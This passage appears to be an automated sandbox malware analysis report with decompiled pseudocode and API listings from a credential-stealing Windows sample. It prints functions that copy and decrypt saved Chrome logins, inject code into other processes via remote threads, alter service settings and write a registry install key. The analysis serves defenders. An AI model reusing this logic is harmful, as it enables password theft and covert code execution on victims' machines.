                                      					__imp__EnumServicesStatusExW(_t90, 0, 0x30, 3, 0, 0,  &_v20,  &_v8,  &_v16, 0);
                                      					_t114 = _v20;
                                      					_t66 = E00255A87(_t114);
                                      					_t112 = _t66;
                                      					_t69 =  &_v20;
                                      					__imp__EnumServicesStatusExW(_t90, 0, 0x30, 3, _t112, _t114, _t69,  &_v8,  &_v16, 0);
                                      					if(_t69 == 0 && GetLastError() != 0xea) {
                                      						goto L9;
                                      					}
                                      					CloseServiceHandle(_t90);
                                      					_t115 = 0;
                                      					if(_v8 <= 0) {
                                      						goto L9;
                                      					}
                                      					_t91 = _t112;
                                      					while( *_t91 != 0) {
                                      						E00253412( &_v12,  *_t91);
                                      						if(E00253075( &_v12, _v32) != 0) {
                                      							_t116 = _t115 * 0x2c;
                                      							E00253264( &_v24, E00253412( &_v28,  *((intOrPtr*)(_t116 + _t112))));
                                      							E00255A2D(_v28);
                                      							_t92 = _v44;
                                      							_v28 = _v28 & 0x00000000;
                                      							 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t116 + _t112 + 0x24));
                                      							E00255A2D(_v12);
                                      							_v12 = _v12 & 0x00000000;
                                      							if( *((intOrPtr*)(_t92 + 0x2c)) != 0) {
                                      								_t105 = _v8;
                                      								_t117 = 0;
                                      								if(_t105 == 0) {
                                      									goto L10;
                                      								}
                                      								while( *_t112 != 0) {
                                      									if( *((intOrPtr*)(_t112 + 0x24)) !=  *((intOrPtr*)(_t92 + 0x2c))) {
                                      										L21:
                                      										_t117 = _t117 + 1;
                                      										_t112 = _t112 + 0x2c;
                                      										if(_t117 < _t105) {
                                      											continue;
                                      										}
                                      										goto L10;
                                      									}
                                      									E00253412( &_v12,  *_t112);
                                      									if(lstrcmpW(_v12, _v24) != 0) {
                                      										E00253412(_t119,  *_t112);
                                      										E002520E1(_t92 + 0x40,  &_v12);
                                      									}
                                      									E00255A2D(_v12);
                                      									_v12 = _v12 & 0x00000000;
                                      									_t105 = _v8;
                                      									goto L21;
                                      								}
                                      								goto L10;
                                      							}
                                      							if(_v36 == 1) {
                                      								goto L9;
                                      							}
                                      							E0025B81D(_v32, 2);
                                      							E0025B889(_v32);
                                      							_v36 = 1;
                                      							E002510C1(_t112);
                                      							_t90 = OpenSCManagerW(0, L"ServicesActive", 5);
                                      							if(_t90 != 0) {
                                      								goto L2;
                                      							}
                                      							goto L9;
                                      						}
                                      						E00255A2D(_v12);
                                      						_v12 = _v12 & 0x00000000;
                                      						_t91 = _t91 + 0x2c;
                                      						_t115 = _t115 + 1;
                                      						if(_t115 < _v8) {
                                      							continue;
                                      						}
                                      						goto L9;
                                      					}
                                      					goto L9;
                                      				}
                                      				goto L9;
                                      			}

                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005), ref: 0025BE03
                                      • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,00000000,?,?,?,00000000), ref: 0025BE3A
                                        • Part of subcall function 00255A87: GetProcessHeap.KERNEL32(00000000,?,00252DD7,?,?,?,0025E39B,?,002558E9,?,?,00000000,?,002555D2,00000000), ref: 00255A8A
                                        • Part of subcall function 00255A87: RtlAllocateHeap.NTDLL(00000000,?,0025E39B,?,002558E9,?,?,00000000,?,002555D2,00000000,?,?,00000000), ref: 00255A91
                                      • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,?,?,?,?,00000000), ref: 0025BE63
                                      • GetLastError.KERNEL32 ref: 0025BE6D
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0025BE7B
                                      • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005,00000000,00000000,00000000), ref: 0025BF3C
                                      • lstrcmpW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 0025BF7F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: EnumHeapManagerOpenServicesStatus$AllocateCloseErrorHandleLastProcessServicelstrcmp
                                      • String ID: ServicesActive
                                      • API String ID: 899334174-3071072050
                                      • Opcode ID: 40422e60fc65ba10c825f25943921898f0765d4d0e811af31343e94f4a4594aa
                                      • Instruction ID: dfc1b161f276b55f3701d724bf9a4b672f63a01433047f887541aeeaf67c123d
                                      • Opcode Fuzzy Hash: 40422e60fc65ba10c825f25943921898f0765d4d0e811af31343e94f4a4594aa
                                      • Instruction Fuzzy Hash: A1516C71920619EBDB16DFA0CC96BEEB7B8EF08302F104169E901B6181EB749E58CF54
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 100%
                                      			E00258A9C(intOrPtr __ecx) {
                                      				char _v272;
                                      				struct _WIN32_FIND_DATAA _v592;
                                      				char _v856;
                                      				char _v1120;
                                      				intOrPtr _t31;
                                      				void* _t36;
                                      
                                      				_t31 = __ecx;
                                      				GetFullPathNameA(0x266698, 0x104,  &_v856, 0);
                                      				PathCombineA( &_v1120,  &_v856, "*");
                                      				_t36 = FindFirstFileA( &_v1120,  &_v592);
                                      				if(_t36 != 0xffffffff) {
                                      					do {
                                      						if((_v592.dwFileAttributes | 0x00000010) == 0x10 && _v592.cFileName != 0x2e) {
                                      							PathCombineA( &_v272, 0x266698,  &(_v592.cFileName));
                                      							PathCombineA( &_v272,  &_v272, "Accounts\\Account.rec0");
                                      							E0025878B(_t31,  &_v272);
                                      						}
                                      					} while (FindNextFileA(_t36,  &_v592) != 0);
                                      				}
                                      				return 0;
                                      			}

                                      APIs
                                      • GetFullPathNameA.KERNEL32(00266698,00000104,?,00000000), ref: 00258ABD
                                      • PathCombineA.SHLWAPI(?,?,00263510), ref: 00258ADC
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00258AEC
                                      • PathCombineA.SHLWAPI(?,00266698,0000002E), ref: 00258B23
                                      • PathCombineA.SHLWAPI(?,?,Accounts\Account.rec0), ref: 00258B32
                                        • Part of subcall function 0025878B: CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 002587A8
                                        • Part of subcall function 0025878B: GetLastError.KERNEL32 ref: 002587B5
                                        • Part of subcall function 0025878B: CloseHandle.KERNEL32(00000000), ref: 002587BC
                                      • FindNextFileA.KERNEL32(00000000,?), ref: 00258B4A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Path$CombineFile$Find$CloseCreateErrorFirstFullHandleLastNameNext
                                      • String ID: .$Accounts\Account.rec0
                                      • API String ID: 3873318193-2526347284
                                      • Opcode ID: 1d773a8ad8aa4498b42aba28097f1441d23fbb71ac1db554839055c746e492db
                                      • Instruction ID: 05ae9a4249566b2bee5abef722b87cdd0b271be035b7b92711e18693aa15539a
                                      • Opcode Fuzzy Hash: 1d773a8ad8aa4498b42aba28097f1441d23fbb71ac1db554839055c746e492db
                                      • Instruction Fuzzy Hash: 471186B290011C6BDB20DBA4DC8DEEE777CDB05315F404596E905E3091E6B49F9C8F64
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      C-Code - Quality: 100%
                                      			E0025FD9E(long __edx) {
                                      				void* _v8;
                                      				long _v12;
                                      				char _v268;
                                      				void _v272;
                                      				void* _t25;
                                      				void* _t27;
                                      				void* _t33;
                                      				void* _t37;
                                      
                                      				_t33 = OpenProcess(0x1fffff, 0, __edx);
                                      				_v8 = _t33;
                                      				_v272 = GetCurrentProcessId();
                                      				_t35 = E002510AD(0xff);
                                      				GetModuleFileNameA(0, _t13, 0xff);
                                      				E00251114( &_v268, _t35);
                                      				_t27 = VirtualAllocEx(_t33, 0, 0x800, 0x3000, 0x40);
                                      				WriteProcessMemory(_t33, _t27, 0x266150, 0x800, 0);
                                      				VirtualProtectEx(_v8, _t27, 0x800, 0x40,  &_v12);
                                      				_t37 = VirtualAllocEx(_v8, 0, 0x103, 0x3000, 4);
                                      				WriteProcessMemory(_v8, _t37,  &_v272, 0x103, 0);
                                      				_t9 = _t27 + 0x10e; // 0x10e
                                      				_t25 = CreateRemoteThread(_v8, 0, 0, _t9, _t37, 0, 0);
                                      				 *0x26679c = _t25;
                                      				return _t25;
                                      			}

                                      APIs
                                      • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,?,?,00000000), ref: 0025FDB2
                                      • GetCurrentProcessId.KERNEL32(?,?,00000000), ref: 0025FDBD
                                        • Part of subcall function 002510AD: GetProcessHeap.KERNEL32(00000000,00000000,0025F750,00000800,00000000,00000000,?,00000000,?,0025F8BB,?,?,?,0025535D,?,00000000), ref: 002510B3
                                        • Part of subcall function 002510AD: HeapAlloc.KERNEL32(00000000,?,00000000,?,0025F8BB,?,?,?,0025535D,?,00000000,00000000,?,?,?,00000000), ref: 002510BA
                                      • GetModuleFileNameA.KERNEL32(00000000,00000000,000000FF,?,?,00000000), ref: 0025FDDB
                                      • VirtualAllocEx.KERNEL32(00000000,00000000,00000800,00003000,00000040,?,?,00000000), ref: 0025FE05
                                      • WriteProcessMemory.KERNEL32(00000000,00000000,00266150,00000800,00000000,?,?,00000000), ref: 0025FE1D
                                      • VirtualProtectEx.KERNEL32(00000000,00000000,00000800,00000040,?,?,?,00000000), ref: 0025FE2E
                                      • VirtualAllocEx.KERNEL32(00000000,00000000,00000103,00003000,00000004,?,?,00000000), ref: 0025FE45
                                      • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000103,00000000,?,?,00000000), ref: 0025FE5B
                                      • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,0000010E,00000000,00000000,00000000), ref: 0025FE6E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$AllocVirtual$HeapMemoryWrite$CreateCurrentFileModuleNameOpenProtectRemoteThread
                                      • String ID:
                                      • API String ID: 910334972-0
                                      • Opcode ID: cbd22f669ebb28d01ca8812a049b56a3584ba3a3dfd7fecda269ed0b0b976d83
                                      • Instruction ID: ef76a2e89fed08f5207fe1157880ecd3a5bb57036956f5c9f83f92a0dcf7250e
                                      • Opcode Fuzzy Hash: cbd22f669ebb28d01ca8812a049b56a3584ba3a3dfd7fecda269ed0b0b976d83
                                      • Instruction Fuzzy Hash: F1214F71640218BFF7249B51EC4FFEA7A6CDB45B60F2041A5F708AA1D1D6F06E448EA4
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 96%
                                      			E0025AFDF(void* __ecx, void* __eflags) {
                                      				char _v8;
                                      				WCHAR* _v12;
                                      				char _v16;
                                      				WCHAR* _v20;
                                      				char _v24;
                                      				signed int _v28;
                                      				signed int _v32;
                                      				signed int _v36;
                                      				char _v40;
                                      				char _v44;
                                      				char _v48;
                                      				char _v52;
                                      				char _v56;
                                      				char _v60;
                                      				signed int _v64;
                                      				signed int _v68;
                                      				void* _v72;
                                      				char _v76;
                                      				intOrPtr _v80;
                                      				char _v84;
                                      				intOrPtr _v88;
                                      				char _v92;
                                      				char _v96;
                                      				char _v100;
                                      				intOrPtr* _t127;
                                      				void* _t128;
                                      				signed int _t131;
                                      				void* _t135;
                                      				char _t136;
                                      				signed int _t141;
                                      				signed int _t142;
                                      				signed int _t143;
                                      				signed int _t144;
                                      				char _t171;
                                      				intOrPtr _t172;
                                      				signed int _t175;
                                      				signed int _t191;
                                      				void* _t260;
                                      				void* _t261;
                                      				void* _t262;
                                      				void* _t263;
                                      				signed int _t264;
                                      				void* _t267;
                                      				void* _t268;
                                      				void* _t269;
                                      
                                      				_t269 = __eflags;
                                      				_t263 = __ecx;
                                      				E002531EC( &_v44, "SELECT * FROM logins");
                                      				_t260 = 0x1a;
                                      				E0025D75B( &_v12, _t260, _t269);
                                      				E00253297( &_v12, _t260, _t269, "\\");
                                      				_t261 = 8;
                                      				E00253162( &_v12, _t269, E002532D4( &_v36, _t261, _t269));
                                      				E00255A2D(_v36);
                                      				E00253297( &_v12, _t261, _t269, L".tmp");
                                      				_t262 = 0x1c;
                                      				E0025D75B( &_v20, _t262, _t269);
                                      				E00253297( &_v20, _t262, _t269, L"\\Google\\Chrome\\User Data\\Default\\Login Data");
                                      				if(PathFileExistsW(_v20) == 0 || CopyFileW(_v20, _v12, 0) == 0) {
                                      					L4:
                                      					_t264 = 0;
                                      					goto L5;
                                      				} else {
                                      					E00253264( &_v20,  &_v12);
                                      					_t127 = E00253381( &_v20,  &_v36);
                                      					_t128 =  *((intOrPtr*)(_t263 + 0x2c))( *_t127,  &_v40, 2, 0);
                                      					_t208 = _v36;
                                      					_t268 = _t267 + 0x10;
                                      					E00255A2D(_v36);
                                      					if(_t128 == 0) {
                                      						_t131 =  *((intOrPtr*)(_t263 + 0x38))(_v40, _v44, 0xffffffff,  &_v8, 0);
                                      						_t268 = _t268 + 0x14;
                                      						__eflags = _t131;
                                      						if(_t131 != 0) {
                                      							goto L3;
                                      						}
                                      						_t135 =  *((intOrPtr*)(_t263 + 0x44))(_v8);
                                      						_t264 = 1;
                                      						while(1) {
                                      							__eflags = _t135 - 0x64;
                                      							if(_t135 != 0x64) {
                                      								break;
                                      							}
                                      							_v68 = _v68 & 0x00000000;
                                      							_t191 = 0;
                                      							_v64 = 0;
                                      							_t136 = E002559AA(_t264);
                                      							_v16 = _t136;
                                      							E002531EC( &_v24,  *((intOrPtr*)(_t263 + 0x40))(_v8, 0));
                                      							E002531EC( &_v60,  *((intOrPtr*)(_t263 + 0x40))(_v8, _t264));
                                      							_t141 =  *((intOrPtr*)(_t263 + 0x5c))(_v8, 3);
                                      							__eflags = _t141;
                                      							if(_t141 > 0) {
                                      								E00252F52( &_v16, E002531EC( &_v48,  *((intOrPtr*)(_t263 + 0x40))(_v8, 3)));
                                      								E00255A2D(_v48);
                                      							}
                                      							_t142 =  *((intOrPtr*)(_t263 + 0x5c))(_v8, 3);
                                      							__eflags = _t142;
                                      							if(_t142 > 0) {
                                      								E00252F52( &_v16, E002531EC( &_v52,  *((intOrPtr*)(_t263 + 0x40))(_v8, 3)));
                                      								E00255A2D(_v52);
                                      							}
                                      							_t143 =  *((intOrPtr*)(_t263 + 0x5c))(_v8, 5);
                                      							__eflags = _t143;
                                      							if(_t143 > 0) {
                                      								_t171 =  *((intOrPtr*)(_t263 + 0x5c))(_v8, 5);
                                      								_v84 = _t171;
                                      								_t172 =  *((intOrPtr*)(_t263 + 0x54))(_v8, 5);
                                      								_t268 = _t268 + 0x10;
                                      								_v80 = _t172;
                                      								_t175 =  &_v84;
                                      								__imp__CryptUnprotectData(_t175, 0, 0, 0, 0, _t264,  &_v76);
                                      								__eflags = _t175;
                                      								if(_t175 != 0) {
                                      									E00252DC1( &_v68, _v72, _v76);
                                      									LocalFree(_v72);
                                      									_t191 = _v64;
                                      								}
                                      							}
                                      							_t144 = E00252EB9( &_v16);
                                      							__eflags = _t144;
                                      							if(_t144 > 0) {
                                      								L17:
                                      								_v100 = 0;
                                      								_v96 = 0;
                                      								_v92 = 0;
                                      								__eflags = E00252EB9( &_v24);
                                      								if(__eflags > 0) {
                                      									E00253264( &_v100, E00252ECA( &_v24, __eflags,  &_v28));
                                      									E00255A2D(_v28);
                                      									_t78 =  &_v28;
                                      									 *_t78 = _v28 & 0x00000000;
                                      									__eflags =  *_t78;
                                      								}
                                      								__eflags = E00252EB9( &_v16);
                                      								if(__eflags > 0) {
                                      									E00253264( &_v96, E00252ECA( &_v16, __eflags,  &_v32));
                                      									E00255A2D(_v32);
                                      									_t85 =  &_v32;
                                      									 *_t85 = _v32 & 0x00000000;
                                      									__eflags =  *_t85;
                                      								}
                                      								__eflags = _t191;
                                      								if(_t191 != 0) {
                                      									E00253264( &_v92, E00252ECA(E00252D59( &_v68,  &_v56), __eflags,  &_v36));
                                      									E00255A2D(_v36);
                                      									_t93 =  &_v36;
                                      									 *_t93 = _v36 & 0x00000000;
                                      									__eflags =  *_t93;
                                      									E00255A2D(_v56);
                                      								}
                                      								_t268 = _t268 - 0x10;
                                      								_v88 = _t264;
                                      								E00251EB9(_t268,  &_v100);
                                      								E00251EEF(_t263);
                                      								E0025138F( &_v100);
                                      								goto L24;
                                      							} else {
                                      								__eflags = _t191;
                                      								if(_t191 == 0) {
                                      									L24:
                                      									E00255A2D(_v60);
                                      									E00255A2D(_v24);
                                      									E00255A2D(_v16);
                                      									E00252E66( &_v68);
                                      									_t135 =  *((intOrPtr*)(_t263 + 0x44))(_v8);
                                      									continue;
                                      								}
                                      								goto L17;
                                      							}
                                      						}
                                      						 *((intOrPtr*)(_t263 + 0x60))(_v8);
                                      						 *((intOrPtr*)(_t263 + 0x34))();
                                      						E0025345A(_t268,  &_v12);
                                      						E0025DEA9(_v40);
                                      						L5:
                                      						E00255A2D(_v20);
                                      						E00255A2D(_v12);
                                      						E00255A2D(_v44);
                                      						return _t264;
                                      					}
                                      					L3:
                                      					E0025345A(_t268,  &_v12);
                                      					E0025DEA9(_t208);
                                      					goto L4;
                                      				}
      			}

                                      APIs
                                        • Part of subcall function 002531EC: lstrlenA.KERNEL32(?,?,?,002555DF,.bss,00000000,?,?,00000000), ref: 002531F5
                                        • Part of subcall function 002531EC: lstrlenA.KERNEL32(?,?,?,002555DF,.bss,00000000,?,?,00000000), ref: 00253202
                                        • Part of subcall function 002531EC: lstrcpyA.KERNEL32(00000000,?,?,?,002555DF,.bss,00000000,?,?,00000000), ref: 00253215
                                        • Part of subcall function 0025D75B: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 0025D78C
                                        • Part of subcall function 00253162: lstrcatW.KERNEL32(00000000,?), ref: 00253192
                                        • Part of subcall function 00255A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0025E2AE,?,?,?,?,?,00000000), ref: 00255A35
                                      • PathFileExistsW.SHLWAPI(00000000), ref: 0025B053
                                      • CopyFileW.KERNEL32(00000000,00000000,00000000), ref: 0025B065
                                        • Part of subcall function 00253264: lstrcpyW.KERNEL32(00000000,00000000), ref: 00253289
                                        • Part of subcall function 00253381: WideCharToMultiByte.KERNEL32(00000000,00000200,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00254AC0,?), ref: 002533AE
                                        • Part of subcall function 00253381: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00254AC0,?,?,?,?,?), ref: 002533D9
                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0025B1CF
                                      • LocalFree.KERNEL32(?,?,?), ref: 0025B1EA
                                        • Part of subcall function 0025345A: lstrcpyW.KERNEL32(00000000,?), ref: 00253484
                                        • Part of subcall function 0025DEA9: DeleteFileW.KERNEL32(?,?,?,002529BF), ref: 0025DEB0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$ByteCharFreeMultiPathWidelstrlen$CopyCryptDataDeleteExistsFolderLocalSpecialUnprotectVirtuallstrcat
                                      • String ID: .tmp$SELECT * FROM logins$\Google\Chrome\User Data\Default\Login Data
                                      • API String ID: 1985407002-2809225024
                                      • Opcode ID: 47e79ea4bec968799e038071f4fff8a974b52a66951e9fa5bed38753b4364335
                                      • Instruction ID: 4e7381d6716f9ba3c76e89ff360835ab6c5f785cc95fa0c360ddd811da286889
                                      • Opcode Fuzzy Hash: 47e79ea4bec968799e038071f4fff8a974b52a66951e9fa5bed38753b4364335
                                      • Instruction Fuzzy Hash: 31A14071920519EBDB05EBA0DC56AEEB779FF14302F100129F912B61A1EF31AE29CF54
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      C-Code - Quality: 100%
                                      			E0025B81D(short** _a4, int _a8) {
                                      				void* _t3;
                                      				short* _t9;
                                      				void* _t12;
                                      				short* _t14;
                                      				void* _t16;
                                      
                                      				_t14 = 0;
                                      				_t3 = OpenSCManagerW(0, L"ServicesActive", 1);
                                      				_t16 = _t3;
                                      				if(_t16 != 0) {
                                      					_t12 = OpenServiceW(_t16,  *_a4, 2);
                                      					if(_t12 != 0) {
                                      						if(ChangeServiceConfigW(_t12, 0xffffffff, _a8, 0xffffffff, 0, 0, 0, 0, 0, 0, 0) != 0) {
                                      							_t14 = 1;
                                      						}
                                      						CloseServiceHandle(_t16);
                                      						CloseServiceHandle(_t12);
                                      						_t9 = _t14;
                                      					} else {
                                      						CloseServiceHandle(_t16);
                                      						_t9 = 0;
                                      					}
                                      					return _t9;
                                      				}
                                      				return _t3;
      			}

                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 0025B82C
                                      • OpenServiceW.ADVAPI32(00000000,?,00000002), ref: 0025B841
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0025B84E
                                      • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0025B867
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0025B87B
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0025B87E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                      • String ID: ServicesActive
                                      • API String ID: 493672254-3071072050
                                      • Opcode ID: a54812c9efbe1cc96003b4cb4c128aa13708a4dd95b93dc9f1fe0f654e08f280
                                      • Instruction ID: df7891c50e1101bda5cbb8a08f08c355cbb405cbf269424caa812323422b8860
                                      • Opcode Fuzzy Hash: a54812c9efbe1cc96003b4cb4c128aa13708a4dd95b93dc9f1fe0f654e08f280
                                      • Instruction Fuzzy Hash: 2EF09631615625F7DA221F66AC8DE5B3F9DDFDA7717008222FA15D61A0CBB4CC18C6A0
                                      Uniqueness

                                      Uniqueness Score: 4.31%

                                      C-Code - Quality: 88%
                                      			E0025F843(void* __ebx, void* __ecx, void* __eflags) {
                                      				long _t2;
                                      				void* _t8;
                                      				struct HINSTANCE__* _t13;
                                      				void* _t15;
                                      				struct HRSRC__* _t18;
                                      
                                      				_t15 = __ecx;
                                      				E00251052(0x2668a8, 0, 0x208);
                                      				_t2 = GetModuleFileNameW(0, 0x2668a8, 0x208);
                                      				__imp__#680();
                                      				if(_t2 == 0 && E0025DB97() != 1) {
                                      					E0025F7D0(_t15);
                                      					_t13 = E0025FBFC();
                                      					_t18 = FindResourceW(_t13, 0x66, L"WM_DSP");
                                      					_t8 = LoadResource(_t13, _t18);
                                      					SizeofResource(_t13, _t18);
                                      					if(LockResource(_t8) != 0) {
                                      						E0025F73D(_t10);
                                      					}
                                      				}
                                      				return 0;
                                      			}

                                      Instruction addresses (one per decompiled statement, in order): 0x0025f843, 0x0025f853, 0x0025f85f, 0x0025f865, 0x0025f86d, 0x0025f87a, 0x0025f889, 0x0025f894, 0x0025f898, 0x0025f8a2, 0x0025f8b2, 0x0025f8b6, 0x0025f8b6, 0x0025f8b2, 0x0025f8bf

                                      APIs
                                      • GetModuleFileNameW.KERNEL32(00000000,002668A8,00000208,00000000,00000000,?,?,?,0025535D,?,00000000,00000000,?,?,?,00000000), ref: 0025F85F
                                      • IsUserAnAdmin.SHELL32 ref: 0025F865
                                        • Part of subcall function 0025DB97: GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,00000000), ref: 0025DBA9
                                        • Part of subcall function 0025DB97: OpenProcessToken.ADVAPI32(00000000,?,?,?,00000000), ref: 0025DBB0
                                        • Part of subcall function 0025DB97: GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,00000000), ref: 0025DBCE
                                        • Part of subcall function 0025DB97: CloseHandle.KERNEL32(00000000), ref: 0025DBE3
                                        • Part of subcall function 0025F7D0: RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\_rptls,00000000,000F003F,?,00000208,002668A8,?,?,?,?,0025F87F), ref: 0025F7F0
                                        • Part of subcall function 0025F7D0: RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\_rptls,00000000,00000000,00000000,000F003F,00000000,?,?,?,?,?,?,0025F87F), ref: 0025F80D
                                        • Part of subcall function 0025F7D0: lstrlenW.KERNEL32(002668A8,?,?,?,?,0025F87F,?,?,?,?,0025535D,?,00000000,00000000), ref: 0025F819
                                        • Part of subcall function 0025F7D0: RegSetValueExW.ADVAPI32(?,Install,00000000,00000001,002668A8,00000000,?,?,?,?,0025F87F,?,?,?,?,0025535D), ref: 0025F82F
                                        • Part of subcall function 0025F7D0: RegCloseKey.ADVAPI32(?,?,?,?,?,0025F87F,?,?,?,?,0025535D,?,00000000,00000000), ref: 0025F838
                                        • Part of subcall function 0025FBFC: MessageBoxA.USER32(00000000,Settings not found !,DEBUG,00000000), ref: 0025FC14
                                      • FindResourceW.KERNEL32(00000000,00000066,WM_DSP), ref: 0025F88E
                                      • LoadResource.KERNEL32(00000000,00000000,?,?,?,?,0025535D,?,00000000,00000000,?,?,?,00000000), ref: 0025F898
                                      • SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,0025535D,?,00000000,00000000,?,?,?,00000000), ref: 0025F8A2
                                      • LockResource.KERNEL32(00000000,?,?,?,?,0025535D,?,00000000,00000000,?,?,?,00000000,?,?,00000000), ref: 0025F8A9
                                        • Part of subcall function 0025F73D: VirtualProtect.KERNEL32(00000000,000007D0,00000040,00000000,00000000,00000000,?,00000000,?,0025F8BB,?,?,?,0025535D,?,00000000), ref: 0025F77B
                                        • Part of subcall function 0025F73D: VirtualAlloc.KERNEL32(00000000,000001FE,00001000,00000040,?,00000000,?,0025F8BB,?,?,?,0025535D,?,00000000,00000000), ref: 0025F78F
                                        • Part of subcall function 0025F73D: GetWindowsDirectoryW.KERNEL32(00000000,00000104,?,00000000,?,0025F8BB,?,?,?,0025535D,?,00000000,00000000,?,?,?), ref: 0025F79D
                                        • Part of subcall function 0025F73D: lstrlenW.KERNEL32(00000000,\System32\cmd.exe,00000028,?,00000000,?,0025F8BB,?,?,?,0025535D,?,00000000,00000000), ref: 0025F7AB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Resource$CloseOpenProcessTokenVirtuallstrlen$AdminAllocCreateCurrentDirectoryFileFindHandleInformationLoadLockMessageModuleNameProtectSizeofUserValueWindows
                                      • String ID: WM_DSP
                                      • API String ID: 1126923897-506093727
                                      • Opcode ID: a60be182dc1185c3e491ed8c9130abdff54038275fa01c002c96414c3b8c8088
                                      • Instruction ID: 1ee7c624a99cddb509238850113c48f16051abdb709f9439945359ec91c3326b
                                      • Opcode Fuzzy Hash: a60be182dc1185c3e491ed8c9130abdff54038275fa01c002c96414c3b8c8088
                                      • Instruction Fuzzy Hash: 4EF0C232624650A7E7603B71BC4DE1F2E5C9F87752F068430FD05E6192DA7488698A74
                                      Uniqueness

                                      Uniqueness Score: 100.00%
